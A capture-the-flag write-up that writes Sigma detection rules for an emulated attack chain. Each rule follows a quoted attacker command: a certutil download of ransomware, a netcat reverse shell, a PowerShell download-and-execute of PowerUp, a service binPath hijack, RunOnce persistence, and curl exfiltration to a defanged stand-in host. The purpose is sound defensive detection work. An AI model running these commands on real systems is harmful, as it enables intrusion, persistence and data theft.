The SigHunt room allows us to train our writing of sigma rules. It emphasis the selection of the right IoCs in order to avoid being too vast by selecting IoCs that are too generic as well as being too specific by selecting IoCs that can be easily changed, thus not extracting the core working of the incident.

The write-up only contains the sigma rules used to obtain the flag. We only need to focus on the detection part of the rule. Therefore I will only write the detection part in this write-up.

1. HTA payload

What we know :

  • Parent Image: chrome.exe
  • Image: mshta.exe
  • Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta
detection:
  selection:
    ParentImage|contains:
        - 'chrome.exe' 
    Image|contains: 
        - 'mshta.exe'
    EventID:'1'
  condition: selection

2. Certutil Download

What we know :

  • Image: certutil.exe
  • Command Line: certutil -urlcache -split -f hxxp[:]//huntmeplz[.]com/ransom.exe ransom.exe
detection:
  selection:
    EventID: '1'
    CommandLine|contains|all:
        - 'certutil'
        - '-urlcache'
        - '-split'
        - '-f'
    Image|contains: 
        - 'certutil.exe'
  condition: selection

3. Netcat Reverse Shell

  • Image: nc.exe
  • Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
  • MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38

Here we either find it by name — nc.exe — or by MD5 hash.

detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - ' -e '
        Image|contains: 
            - 'nc.exe'
  selection2:
        Hashes|contains: 
            - 'MD5=523613A7B9DFA398CBD5EBD2DD0F4F38'
  condition: selection or selection2

4. PowerUp Enumeration

  • Image: powershell.exe
  • Command Line: powershell “iex(new-object net.webclient).downloadstring(‘hxxp[://]huntmeplz[.]com/PowerUp.ps1’); Invoke-AllChecks;”
detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - 'downloadstring'
            - 'powershell'
            - 'Invoke-AllChecks'
            - 'new-object net.webclient'
        Image|contains: 
            - 'powershell.exe'
  condition: selection

5. Service Binary Modification

  • Image: sc.exe
  • Command Line: sc.exe config SNMPTRAP binPath= “C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe”
detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - ' binPath= '
            - 'sc.exe'
            - ' config '
        Image|contains: 
            - 'sc.exe'
  condition: selection

6. RunOnce Persistence

  • Image: reg.exe
  • Command Line: reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce” /v MicrosoftUpdate /t REG_SZ /d “C:\Windows\System32\cmdd.exe”
detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
            - 'reg'
            - ' add '
        Image|contains: 
            - 'reg.exe'
  condition: selection

7. 7-zip Collection

  • Image: 7z.exe
  • Command Line: 7z a exfil.zip * -p
detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - '-p'
            - '7z'
            - ' a '
        Image|contains: 
            - '7z.exe'
  condition: selection

8. cURL Exfiltration

  • Image: curl.exe
  • Command Line: curl -d @exfil.zip hxxp[://]huntmeplz[.]com:8080/
detection:
  selection:
        EventID: 1
        CommandLine|contains|all:
            - '.zip'
            - 'curl'
            - ' -d '
        Image|contains: 
            - 'curl.exe'
  condition: selection

9. Ransomware File Encryption

  • Image: ransom.exe
  • Target Filename: *.huntme
detection:
  selection:
        EventID: 11
        TargetFilename|endswith:
            - 'huntme'
  condition: selection

This is the end of the write-up. Hope it was useful.